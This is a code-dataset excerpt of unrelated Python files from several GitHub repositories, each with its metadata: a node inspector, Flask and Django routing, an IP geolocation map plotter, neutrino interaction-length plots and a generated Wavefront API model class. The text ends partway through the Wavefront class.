normalize_indent\n\n content = \"\"\n if text:\n offset = \" \" * (indent + 2)\n content = (\n f'{offset}\"\"\"\\n{normalize_indent(self.content, indent+4)}\\n{offset}\"\"\"'\n )\n if color:\n return [\n SAIML.parse(\n f\"{' '*indent}[@Fred]{self.type}[@F].[@Fblue]{self.name}[@F]\"\n + (f\"\\n[@Fgreen]{SAIML.escape(content)}[@F]\" if text else \"\"),\n ),\n ]\n return [\n f\"{' '*indent}{self.type}.{self.name}\" + (f\"\\n{content}\" if text else \"\"),\n ]\n\n def __str__(self) -> str: # pragma: no cover\n return self.__format__()[0]\n\n\ndef inspect(\n node: Node,\n color: bool = False,\n text: bool = False,\n) -> str: # pragma: no cover\n \"\"\"Inspected a given node recursively.\n\n Args:\n node (Node): Any type of node to inspect.\n color (bool): Whether to return a string with ansi encoding. Default False.\n text (bool): Whether to include the text from comment and text nodes. Default False.\n\n Return:\n A formatted multiline string representation of the node and it's children.\n \"\"\"\n if isinstance(node, Node):\n return \"\\n\".join(node.__format__(color=color, text=text))\n raise TypeError(f\"Can only inspect phml Nodes was, {node!r}\")\n","repo_name":"Tired-Fox/phml","sub_path":"phml/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":27428,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"74392891713","text":"from flask import *\n\nfrom Components.database import *\n\nroutes = Blueprint('routes' , __name__ ,)\n\n\n@routes.route(\"/api/contact\" , methods = ['POST'])\ndef contact():\n email = request.json['email']\n name = request.json['name']\n phone = request.json['phone']\n msg = request.json['msg']\n \n return jsonify({\n \"messages\": \"Thank you for your message! We will be in touch soon\",\n })","repo_name":"taidavis1/BookingApp","sub_path":"Backend/Components/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43600987706","text":"from django.urls import path\n\nfrom person.views import LoginUser\nfrom .views import *\n\nurlpatterns = [\n path('', LoginUser.as_view(), name='login'),\n path('statements_list/', StatementsView.as_view(), name='statements_list'),\n path('statements/statement_add/', StatementAdd.as_view(), name='statement_add'),\n path('statements/statement_mod/', StatementMod.as_view(), name='statement_mod'),\n\n path('contracts/contracts_list/', ContractsView.as_view(), name='contracts_list'),\n path('contracts/contract_add/', ContractAdd.as_view(), name='contract_add'),\n path('contracts/contract_mod/', ContractMod.as_view(), name='contract_mod'),\n path('contracts/contract_print/', ContractPrint.as_view(), name='contract_print'),\n path('contracts/contract_view/', ContractView.as_view(), name='contract_view'),\n path('contracts/contract/', ContractVee.as_view(), name='contract'),\n\n path('plot_wood_species/plot_wood_species_add/', PlotWoodSpeciesAdd.as_view(), name='plot_wood_species_add'),\n path('plot_wood_species/plot_wood_species_mod/', PlotWoodSpeciesMod.as_view(), name='plot_wood_species_mod'),\n\n path('guides/', GuidesView.as_view(), name='guides'),\n\n path('guides/breeds/', BreedsView.as_view(), name='breeds'),\n path('guides/breeds/breed_mod/', BreedMod.as_view(), name='breed_mod'),\n path('guides/breeds/form_del/', BreedDel.as_view(), name='form_breed_del'),\n\n path('guides/tracts/', TractsView.as_view(), name='tracts'),\n path('guides/tracts/tract_mod/', TractMod.as_view(), name='tract_mod'),\n path('guides/tracts/form_del/', TractDel.as_view(), name='form_tract_del'),\n\n # path('guides/forestrys/', ForestryView.as_view(), name='forestrys'),\n # path('guides/forestrys/forestry_mod/', ForestryMod.as_view(), name='forestry_mod'),\n # path('guides/forestrys/form_del/', ForestryDel.as_view(), name='form_forestry_del'),\n\n path('guides/district_forestrys/', DistrictForestryView.as_view(), name='district_forestrys'),\n path('guides/district_forestrys/district_forestry_mod/', DistrictForestryMod.as_view(), name='district_forestry_mod'),\n path('guides/district_forestrys/form_del/', DistrictForestryDel.as_view(), name='form_district_forestry_del'),\n]\n","repo_name":"drugoifynjy/Les","sub_path":"les/sobnushdi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"529471663","text":"import pygeoip\nimport requests\nimport os\nfrom common.constants import COLLECTOR_ROOT\nimport logging\n\nlog = logging.getLogger()\n\n_MAPSTR = \"&markers=color:%s|%.6f,%.6f\"\n_MAPURLBASE = \"http://maps.google.com/maps/api/staticmap?zoom=1&size=500x300&sensor=false\"\n\nclass Geo:\n def __init__(self,ipaddress=False):\n self.ipaddress = ipaddress\n\n def getUrl(self,mapbase=_MAPURLBASE):\n maps = []\n colors = ['red', 'yellow']\n try:\n gic = pygeoip.GeoIP(os.path.join(COLLECTOR_ROOT,\"geo\",'GeoLiteCity.dat'), pygeoip.MEMORY_CACHE)\n for ip,rep,status in self.ipaddress:\n if status[\"status\"] == True:\n coloridx = 0\n else:\n coloridx = 1\n data = gic.record_by_addr(ip)\n maps += [_MAPSTR % (colors[coloridx],\n data['latitude'],\n data['longitude'])\n ]\n url = mapbase + \"\".join(maps)\n FinalMap = requests.get(url)\n out = open(os.path.join(COLLECTOR_ROOT,\"tmp\",\"worldmap.png\"),\"wb\")\n out.write(FinalMap.content)\n out.close()\n except Exception as error:\n log.error(error)\n\n\"\"\"def main():\n url = getUrl(ipaddress)\n print url\n pass\n\nif __name__ == '__main__':\n main()\"\"\"\n","repo_name":"cnbird1999/triana","sub_path":"util/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42262303821","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Mauricio Bustamante\"\n__email__ = \"mbustamante@nbi.ku.dk\"\n\n\n\"\"\"\ninteraction_length.py:\n Routines to calculate neutrino-neutrino interaction length\n\nCreated: 2018/09/30 18:25\nLast modified: 2018/09/30 18:25\n\"\"\"\n\n\nimport numpy as np\nfrom pylab import *\nfrom matplotlib import *\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nfrom cross_section import *\nfrom global_defs import *\nfrom cosmology import *\n\ndef Interaction_Length_Nu_Nu(energy_nu, z, mass_mediator, \\\n coupling_mediator, mass_neutrino=1.e-10):\n\n # [cm^2]\n cross_section = Cross_Section_Nu_Nu_S_Channel_Scalar(energy_nu,\n mass_mediator, coupling_mediator, mass_neutrino=mass_neutrino)\n\n # [cm^{-3}]\n target_spectrum = 56. * pow(1.0+z, 3.0)\n\n # [cm]\n int_length = 1.0/(cross_section*target_spectrum)\n\n return int_length # [cm]\n\n\n\ndef Plot_Interaction_Length_Nu_Nu_Models_A_B_C_D(\\\n log10_energy_nu_min = 5.0, log10_energy_nu_max=8.0,\n log10_energy_nu_npts=100, lst_redshift=[0.0],\n lst_mass_mediator=[0.1], lst_coupling_mediator=[0.3], lst_legends=[''],\n lst_labels=[''], mass_neutrino=1.e-10, filename_out='int_length',\n output_format='pdf'):\n\n print(\"Plot_Interaction_Length_Nu_Nu_Models_A_B_C_D: \"+ \\\n \"Plotting interaction length nu-nu s-channel, scalar mediator...\")\n\n # Open the plot and format it\n mpl.rcParams['xtick.labelsize']=26\n mpl.rcParams['ytick.labelsize']=26\n mpl.rcParams['legend.fontsize']=18\n mpl.rcParams['legend.borderpad']=0.4\n mpl.rcParams['axes.labelpad']=10\n mpl.rcParams['ps.fonttype']=42\n mpl.rcParams['pdf.fonttype']=42\n\n # Neutrino energy [GeV]\n lst_log10_energy_nu = \\\n np.linspace(log10_energy_nu_min, log10_energy_nu_max, \\\n log10_energy_nu_npts) # [GeV]\n lst_energy_nu_base = [10.**x for x in lst_log10_energy_nu] # [GeV]\n\n lst_colors = ['C0', 'C1', 'C2', 'C3']\n lst_ls = ['-', '--', ':', '-.']\n\n fig, axes = plt.subplots(len(lst_mass_mediator), 1, figsize=[9,9],\n sharex=True)\n fig.subplots_adjust(hspace=0.05, wspace=0.38) #0.05\n\n for i in range(len(axes)):\n\n ax = axes[i]\n mass_mediator = lst_mass_mediator[i]\n coupling_mediator = lst_coupling_mediator[i]\n\n # Calculate resonance energy\n energy_nu_res = mass_mediator*mass_mediator/2.0/mass_neutrino\n lst_energy_nu = lst_energy_nu_base + [energy_nu_res]\n lst_energy_nu.sort()\n\n for j, z in enumerate(lst_redshift):\n\n color = lst_colors[j]\n ls = lst_ls[j]\n legend = lst_legends[j]\n\n lst_int_length = [Interaction_Length_Nu_Nu(energy_nu, z,\n mass_mediator, coupling_mediator,\n mass_neutrino=mass_neutrino) * \\\n conv_cm_to_Mpc*1.e6 \\\n for energy_nu in lst_energy_nu]\n\n ax.plot(lst_energy_nu, lst_int_length, color=color, ls=ls,\n label=legend)\n\n ax.tick_params('both', length=10, width=2, which='major')\n ax.tick_params('both', length=5, width=1, which='minor')\n ax.tick_params(axis='both', which='major', pad=10, direction='in')\n ax.tick_params(axis='both', which='minor', pad=10, direction='in')\n ax.tick_params(axis='y', which='minor', left='on')\n ax.tick_params(axis='y', which='minor', right='on')\n ax.tick_params(axis='x', which='minor', bottom='on')\n ax.tick_params(axis='x', which='minor', top='on')\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n\n if (i == 0):\n ax.annotate( r'xxxxxxx', \\\n xy = (0.825,0.76), \\\n xycoords='axes fraction', color=None, alpha=0.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6,\n bbox=dict(boxstyle='round', fc=\"wheat\", alpha=0.5, ec=\"k\") )\n ax.annotate( lst_labels[i], \\\n xy = (0.82,0.74), \\\n xycoords='axes fraction', color='k', fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6 )\n else:\n ax.annotate( r'xxxxxxx', \\\n xy = (0.825,0.23), \\\n xycoords='axes fraction', color=None, alpha=0.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6,\n bbox=dict(boxstyle='round', fc=\"wheat\", alpha=0.5, ec=\"k\") )\n ax.annotate( lst_labels[i], \\\n xy = (0.82,0.21), \\\n xycoords='axes fraction', color='k', fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6 )\n\n if (i != 3):\n # ax.xaxis.set_visible(False)\n # ax.ravel().set_axis_off()\n ax.get_xaxis().set_ticklabels([])\n # ax.xaxis.set_major_formatter(plt.NullFormatter())\n\n # ax.set_xticklabels([])\n if (i == 3):\n ax.set_xlabel(r'Neutrino energy $E$ [GeV]', fontsize=25)\n # if (i != 3):\n # ax.set_xlabel('', fontsize=25)\n if (i == 1):\n ax.set_ylabel(r'Interaction length $\\nu\\nu$ $s$-channel [pc]', fontsize=25)\n ax.yaxis.set_label_coords(-0.13, -0.025)\n\n if (i == 0):\n ax.legend(loc='lower left', ncol=2)\n\n # pylab.xlim([10.**log10_energy_nu_min, 10.**log10_energy_nu_max])\n ax.set_xlim([10.**log10_energy_nu_min, 10.**log10_energy_nu_max])\n ax.set_xscale('log')\n\n # pylab.ylim([1e-31, 1e-20])\n ax.set_yscale('log')\n\n log10_int_length_min = floor(log10(min(lst_int_length)))\n log10_int_length_max = ceil(log10(max(lst_int_length)))\n lst_log10_int_length = np.linspace(log10_int_length_min,\n log10_int_length_max,\n log10_int_length_max-log10_int_length_min+1)\n ax_yticks_major = [10.**log10_int_length\n for log10_int_length in lst_log10_int_length[::3]]\n ax_yticks_minor = [10.**log10_int_length\n for log10_int_length in lst_log10_int_length[::1]]\n # print(lst_log10_int_length)\n\n # if (i == 0):\n # print(min(lst_int_length), max(lst_int_length))\n # ax_yticks_major = np.array([1.e-31, 1.e-30, 1.e-29, 1.e-28, 1.e-27, \\\n # 1.e-26, 1.e-25, 1.e-24, 1.e-23, 1.e-22, 1.e-21, \\\n # 1.e-20])\n\n ax.yaxis.set_major_locator(matplotlib.ticker.FixedLocator( \\\n ax_yticks_major))\n # ax.yaxis.set_minor_locator(matplotlib.ticker.FixedLocator( \\\n # ax_yticks_minor))\n\n # Save the plot\n filename_out = os.getcwd()+'/output/plots/'+filename_out\n pylab.savefig(filename_out+'.'+output_format, \\\n bbox_inches='tight', dpi=300)\n plt.close()\n\n return\n\n\n###############################################################################\n###############################################################################\n\n\n\ndef Plot_Lookback_Distance_Between_Redshifts( \\\n filename_out='distance_between_redshifts',\n log10_delta_z_min=-10., log10_delta_z_max=0., log10_delta_z_npts=10,\n lst_z_base=[0.01], energy_nu_min=1.e3, energy_nu_max=1.e7,\n output_format='pdf', lst_mass_mediator=[0.1], lst_coupling_mediator=[0.3],\n mass_neutrino=1.e-10):\n\n print(\"Plot_Lookback_Distance_Between_Redshifts: \"+ \\\n \"Plotting lookback distance between two redshifts...\")\n\n # Open the plot and format it\n mpl.rcParams['xtick.labelsize']=26\n mpl.rcParams['ytick.labelsize']=26\n mpl.rcParams['legend.fontsize']=18\n mpl.rcParams['legend.borderpad']=0.4\n mpl.rcParams['axes.labelpad']=10\n mpl.rcParams['ps.fonttype']=42\n mpl.rcParams['pdf.fonttype']=42\n\n # Neutrino energy [GeV]\n lst_log10_delta_z = \\\n np.linspace(log10_delta_z_min, log10_delta_z_max, \\\n log10_delta_z_npts) # [GeV]\n lst_delta_z = [10.**log10_delta_z for log10_delta_z in lst_log10_delta_z]\n\n lst_colors = ['C0', 'C1', 'C2', 'C3', 'C4']\n lst_ls = ['-', '--', ':', '-.', (0, (1, 1))]\n\n fig, ax = plt.subplots(1, 1, figsize=[9,9])\n\n for i, z_base in enumerate(lst_z_base):\n\n ls = lst_ls[i]\n\n lst_delta_z_sel = []\n lst_delta_dist = []\n for delta_z in lst_delta_z:\n if (z_base-delta_z >= 0):\n lst_delta_z_sel.append(delta_z)\n dist_diff = \\\n 1.e3*(Lookback_Distance(z_base)-Lookback_Distance(z_base-delta_z)) # [Mpc]\n lst_delta_dist.append(dist_diff)\n\n # Plot the distance difference\n ax.plot(lst_delta_z_sel, lst_delta_dist, color='k', ls=ls, lw=2.0,\n label=r'$z_i = $'+' '+str(z_base), zorder=4)\n\n # Plot interaction lengths\n # int_length_energy_nu_min = \\\n # Interaction_Length_Nu_Nu(energy_nu_min, z_base, mass_mediator, \\\n # coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n # int_length_energy_nu_max = \\\n # Interaction_Length_Nu_Nu(energy_nu_max, z_base, mass_mediator, \\\n # coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n # ax.fill_between([min(lst_delta_z), max(lst_delta_z)],\n # [int_length_energy_nu_min, int_length_energy_nu_min],\n # [int_length_energy_nu_max, int_length_energy_nu_max],\n # edgecolor=None, facecolor=color, alpha=0.5, zorder=2)\n\n for j in range(len(lst_mass_mediator)):\n color = lst_colors[j]\n mass_mediator = lst_mass_mediator[j] # [GeV]\n coupling_mediator = lst_coupling_mediator[j]\n energy_nu_res = mass_mediator*mass_mediator/2.0/mass_neutrino # [GeV]\n int_length = \\\n Interaction_Length_Nu_Nu(energy_nu_res, z_base, mass_mediator, \\\n coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n ax.plot([min(lst_delta_z), max(lst_delta_z)],\n [int_length, int_length], color=color, ls=ls, lw=2.0, zorder=4)\n\n for i in range(len(lst_mass_mediator)):\n color = lst_colors[i]\n mass_mediator = lst_mass_mediator[i] # [GeV]\n coupling_mediator = lst_coupling_mediator[i]\n energy_nu_res = mass_mediator*mass_mediator/2.0/mass_neutrino # [GeV]\n int_length_top = \\\n Interaction_Length_Nu_Nu(energy_nu_res, lst_z_base[0], \\\n mass_mediator, coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n int_length_bottom = \\\n Interaction_Length_Nu_Nu(energy_nu_res, lst_z_base[-1], \\\n mass_mediator, coupling_mediator, mass_neutrino)*conv_cm_to_Mpc\n ax.fill_between([min(lst_delta_z), max(lst_delta_z)],\n [int_length_top, int_length_top],\n [int_length_bottom, int_length_bottom],\n edgecolor=None, facecolor=color, alpha=0.4, zorder=2)\n\n ax.annotate( r'$L(z_i)-L(z_f)$', \\\n xy = (0.42,0.58), \\\n xycoords='axes fraction', color='k', alpha=1.0, fontsize=21, \\\n horizontalalignment='left', rotation=47, zorder=6)\n ax.annotate( r'$L_{\\nu\\nu, \\rm int}(E_{\\rm res})$ -- Model A', \\\n xy = (0.04,0.90), \\\n xycoords='axes fraction', color=lst_colors[0], alpha=1.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6)\n ax.annotate( r'$L_{\\nu\\nu, \\rm int}(E_{\\rm res})$ -- Model D', \\\n xy = (0.55,0.35), \\\n xycoords='axes fraction', color=lst_colors[1], alpha=1.0, fontsize=21, \\\n horizontalalignment='left', rotation=0, zorder=6)\n\n ax.tick_params('both', length=10, width=2, which='major')\n ax.tick_params('both', length=5, width=1, which='minor')\n ax.tick_params(axis='both', which='major', pad=10, direction='in')\n ax.tick_params(axis='both', which='minor', pad=10, direction='in')\n ax.tick_params(axis='y', which='minor', left='on')\n ax.tick_params(axis='y', which='minor', right='on')\n ax.tick_params(axis='x', which='minor', bottom='on')\n ax.tick_params(axis='x', which='minor', top='on')\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n\n ax.set_xlabel(r'Redshift difference $\\Delta z = z_i - z_f$', fontsize=25)\n ax.set_ylabel(r'Lookback distance $L$ between $z_i$ and $z_f$ [Mpc]', fontsize=25)\n ax.legend(loc='lower right', ncol=1)\n\n # ax.set_xlim([10.**log10_delta_z_min, 10.**log10_delta_z_max])\n ax.set_xlim([10.**log10_delta_z_min, 1.e-3])\n ax.set_ylim([1.e-9, 2.e-2])\n ax.set_xscale('log')\n ax.set_yscale('log')\n\n ax_xticks_major = [1.e-10, 1.e-9, 1.e-8, 1.e-7, 1.e-6, 1.e-5, 1.e-4, 1.e-3]\n # ax_xticks_minor = [1.e-9, 1.e-7, 1.e-5, 1.e-3]\n ax.xaxis.set_major_locator(matplotlib.ticker.FixedLocator( \\\n ax_xticks_major))\n # ax.xaxis.set_minor_locator(matplotlib.ticker.FixedLocator( \\\n # ax_xticks_minor))\n\n # Save the plot\n filename_out = os.getcwd()+'/output/plots/'+filename_out\n pylab.savefig(filename_out+'.'+output_format, \\\n bbox_inches='tight', dpi=300)\n plt.close()\n\n return\n\n\n\n###############################################################################\n###############################################################################\n\n\nPlot_Lookback_Distance_Between_Redshifts( \\\n filename_out='distance_between_redshifts_model_A',\n log10_delta_z_min=-10.5, log10_delta_z_max=0., log10_delta_z_npts=10,\n lst_z_base=[0.01, 2.0, 4.0, 6.0], output_format='pdf',\n lst_mass_mediator=[0.1, 0.001],\n lst_coupling_mediator=[0.3, 0.01],\n mass_neutrino=1.e-10,\n energy_nu_min=1.e3, energy_nu_max=1.e8)\n # lst_mass_mediator=[0.1, 0.01, 0.003, 0.001],\n # lst_coupling_mediator=[0.3, 0.03, 0.03, 0.01],\n\n\n###############################################################################\n###############################################################################\n\n\n\"\"\"\nPlot_Interaction_Length_Nu_Nu_Models_A_B_C_D(\\\n log10_energy_nu_min = 3.0, log10_energy_nu_max=8.0,\n log10_energy_nu_npts=1000, lst_redshift=[0.0, 2.0, 4.0, 6.0],\n lst_mass_mediator=[0.1, 0.01, 0.003, 0.001],\n lst_coupling_mediator=[0.3, 0.03, 0.03, 0.01],\n mass_neutrino=1.e-10, filename_out='int_length', output_format='pdf',\n lst_legends=[r'$z = 0$', r'$z = 2$', r'$z = 4$', r'$z = 6$'],\n lst_labels=['Model A', 'Model B', 'Model C', 'Model D'])\nquit()\n\"\"\"\n","repo_name":"mbustama/secret-nu-int","sub_path":"code/interaction_length.py","file_name":"interaction_length.py","file_ext":"py","file_size_in_byte":14326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20803068234","text":"# coding: utf-8\n\n\"\"\"\n Wavefront REST API Documentation\n\n

The REST API enables you to interact with the Wavefront service by using standard REST API tools. You can use the REST API to automate commonly executed operations, for example to tag sources automatically.

When you make REST API calls outside the REST API documentation UI, to authenticate to the service, you must use an API token associated with a user account or a service account. For information on how to get the API token and examples, see Use the Wavefront REST API.

# noqa: E501\n\n OpenAPI spec version: v2\n Contact: chitimba@wavefront.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom wavefront_api_client.configuration import Configuration\n\n\nclass MonitoredServiceDTO(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'application': 'str',\n 'cluster': 'str',\n 'component': 'str',\n 'created': 'int',\n 'custom_dashboard_link': 'str',\n 'favorite': 'bool',\n 'hidden': 'bool',\n 'id': 'str',\n 'last_reported': 'int',\n 'last_updated': 'int',\n 'origin': 'str',\n 'satisfied_latency_millis': 'int',\n 'service': 'str',\n 'service_instance_count': 'int',\n 'source': 'str',\n 'status': 'str',\n 'update_user_id': 'str'\n }\n\n attribute_map = {\n 'application': 'application',\n 'cluster': 'cluster',\n 'component': 'component',\n 'created': 'created',\n 'custom_dashboard_link': 'customDashboardLink',\n 'favorite': 'favorite',\n 'hidden': 'hidden',\n 'id': 'id',\n 'last_reported': 'lastReported',\n 'last_updated': 'lastUpdated',\n 'origin': 'origin',\n 'satisfied_latency_millis': 'satisfiedLatencyMillis',\n 'service': 'service',\n 'service_instance_count': 'serviceInstanceCount',\n 'source': 'source',\n 'status': 'status',\n 'update_user_id': 'updateUserId'\n }\n\n def __init__(self, application=None, cluster=None, component=None, created=None, custom_dashboard_link=None, favorite=None, hidden=None, id=None, last_reported=None, last_updated=None, origin=None, satisfied_latency_millis=None, service=None, service_instance_count=None, source=None, status=None, update_user_id=None, _configuration=None): # noqa: E501\n \"\"\"MonitoredServiceDTO - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._application = None\n self._cluster = None\n self._component = None\n self._created = None\n self._custom_dashboard_link = None\n self._favorite = None\n self._hidden = None\n self._id = None\n self._last_reported = None\n self._last_updated = None\n self._origin = None\n self._satisfied_latency_millis = None\n self._service = None\n self._service_instance_count = None\n self._source = None\n self._status = None\n self._update_user_id = None\n self.discriminator = None\n\n self.application = application\n if cluster is not None:\n self.cluster = cluster\n self.component = component\n if created is not None:\n self.created = created\n if custom_dashboard_link is not None:\n self.custom_dashboard_link = custom_dashboard_link\n if favorite is not None:\n self.favorite = favorite\n if hidden is not None:\n self.hidden = hidden\n if id is not None:\n self.id = id\n if last_reported is not None:\n self.last_reported = last_reported\n if last_updated is not None:\n self.last_updated = last_updated\n if origin is not None:\n self.origin = origin\n if satisfied_latency_millis is not None:\n self.satisfied_latency_millis = satisfied_latency_millis\n self.service = service\n self.service_instance_count = service_instance_count\n self.source = source\n if status is not None:\n self.status = status\n if update_user_id is not None:\n self.update_user_id = update_user_id\n\n @property\n def application(self):\n \"\"\"Gets the application of this MonitoredServiceDTO. # noqa: E501\n\n Application Name of the monitored service # noqa: E501\n\n :return: The application of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._application\n\n @application.setter\n def application(self, application):\n \"\"\"Sets the application of this MonitoredServiceDTO.\n\n Application Name of the monitored service # noqa: E501\n\n :param application: The application of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and application is None:\n raise ValueError(\"Invalid value for `application`, must not be `None`\") # noqa: E501\n\n self._application = application\n\n @property\n def cluster(self):\n \"\"\"Gets the cluster of this MonitoredServiceDTO. # noqa: E501\n\n Cluster of monitored service # noqa: E501\n\n :return: The cluster of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cluster\n\n @cluster.setter\n def cluster(self, cluster):\n \"\"\"Sets the cluster of this MonitoredServiceDTO.\n\n Cluster of monitored service # noqa: E501\n\n :param cluster: The cluster of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._cluster = cluster\n\n @property\n def component(self):\n \"\"\"Gets the component of this MonitoredServiceDTO. # noqa: E501\n\n Component Name of the monitored service # noqa: E501\n\n :return: The component of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._component\n\n @component.setter\n def component(self, component):\n \"\"\"Sets the component of this MonitoredServiceDTO.\n\n Component Name of the monitored service # noqa: E501\n\n :param component: The component of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and component is None:\n raise ValueError(\"Invalid value for `component`, must not be `None`\") # noqa: E501\n\n self._component = component\n\n @property\n def created(self):\n \"\"\"Gets the created of this MonitoredServiceDTO. # noqa: E501\n\n Created epoch of monitored service # noqa: E501\n\n :return: The created of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._created\n\n @created.setter\n def created(self, created):\n \"\"\"Sets the created of this MonitoredServiceDTO.\n\n Created epoch of monitored service # noqa: E501\n\n :param created: The created of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._created = created\n\n @property\n def custom_dashboard_link(self):\n \"\"\"Gets the custom_dashboard_link of this MonitoredServiceDTO. # noqa: E501\n\n Customer dashboard link # noqa: E501\n\n :return: The custom_dashboard_link of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._custom_dashboard_link\n\n @custom_dashboard_link.setter\n def custom_dashboard_link(self, custom_dashboard_link):\n \"\"\"Sets the custom_dashboard_link of this MonitoredServiceDTO.\n\n Customer dashboard link # noqa: E501\n\n :param custom_dashboard_link: The custom_dashboard_link of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._custom_dashboard_link = custom_dashboard_link\n\n @property\n def favorite(self):\n \"\"\"Gets the favorite of this MonitoredServiceDTO. # noqa: E501\n\n favorite status of monitored service # noqa: E501\n\n :return: The favorite of this MonitoredServiceDTO. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._favorite\n\n @favorite.setter\n def favorite(self, favorite):\n \"\"\"Sets the favorite of this MonitoredServiceDTO.\n\n favorite status of monitored service # noqa: E501\n\n :param favorite: The favorite of this MonitoredServiceDTO. # noqa: E501\n :type: bool\n \"\"\"\n\n self._favorite = favorite\n\n @property\n def hidden(self):\n \"\"\"Gets the hidden of this MonitoredServiceDTO. # noqa: E501\n\n Monitored service is hidden or not # noqa: E501\n\n :return: The hidden of this MonitoredServiceDTO. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._hidden\n\n @hidden.setter\n def hidden(self, hidden):\n \"\"\"Sets the hidden of this MonitoredServiceDTO.\n\n Monitored service is hidden or not # noqa: E501\n\n :param hidden: The hidden of this MonitoredServiceDTO. # noqa: E501\n :type: bool\n \"\"\"\n\n self._hidden = hidden\n\n @property\n def id(self):\n \"\"\"Gets the id of this MonitoredServiceDTO. # noqa: E501\n\n unique ID of monitored service # noqa: E501\n\n :return: The id of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this MonitoredServiceDTO.\n\n unique ID of monitored service # noqa: E501\n\n :param id: The id of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def last_reported(self):\n \"\"\"Gets the last_reported of this MonitoredServiceDTO. # noqa: E501\n\n Last reported epoch of monitored service # noqa: E501\n\n :return: The last_reported of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._last_reported\n\n @last_reported.setter\n def last_reported(self, last_reported):\n \"\"\"Sets the last_reported of this MonitoredServiceDTO.\n\n Last reported epoch of monitored service # noqa: E501\n\n :param last_reported: The last_reported of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._last_reported = last_reported\n\n @property\n def last_updated(self):\n \"\"\"Gets the last_updated of this MonitoredServiceDTO. # noqa: E501\n\n Last update epoch of monitored service # noqa: E501\n\n :return: The last_updated of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._last_updated\n\n @last_updated.setter\n def last_updated(self, last_updated):\n \"\"\"Sets the last_updated of this MonitoredServiceDTO.\n\n Last update epoch of monitored service # noqa: E501\n\n :param last_updated: The last_updated of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._last_updated = last_updated\n\n @property\n def origin(self):\n \"\"\"Gets the origin of this MonitoredServiceDTO. # noqa: E501\n\n origin of monitored service # noqa: E501\n\n :return: The origin of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._origin\n\n @origin.setter\n def origin(self, origin):\n \"\"\"Sets the origin of this MonitoredServiceDTO.\n\n origin of monitored service # noqa: E501\n\n :param origin: The origin of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._origin = origin\n\n @property\n def satisfied_latency_millis(self):\n \"\"\"Gets the satisfied_latency_millis of this MonitoredServiceDTO. # noqa: E501\n\n Satisfied latency of monitored service # noqa: E501\n\n :return: The satisfied_latency_millis of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._satisfied_latency_millis\n\n @satisfied_latency_millis.setter\n def satisfied_latency_millis(self, satisfied_latency_millis):\n \"\"\"Sets the satisfied_latency_millis of this MonitoredServiceDTO.\n\n Satisfied latency of monitored service # noqa: E501\n\n :param satisfied_latency_millis: The satisfied_latency_millis of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._satisfied_latency_millis = satisfied_latency_millis\n\n @property\n def service(self):\n \"\"\"Gets the service of this MonitoredServiceDTO. # noqa: E501\n\n Service Name of the monitored service # noqa: E501\n\n :return: The service of 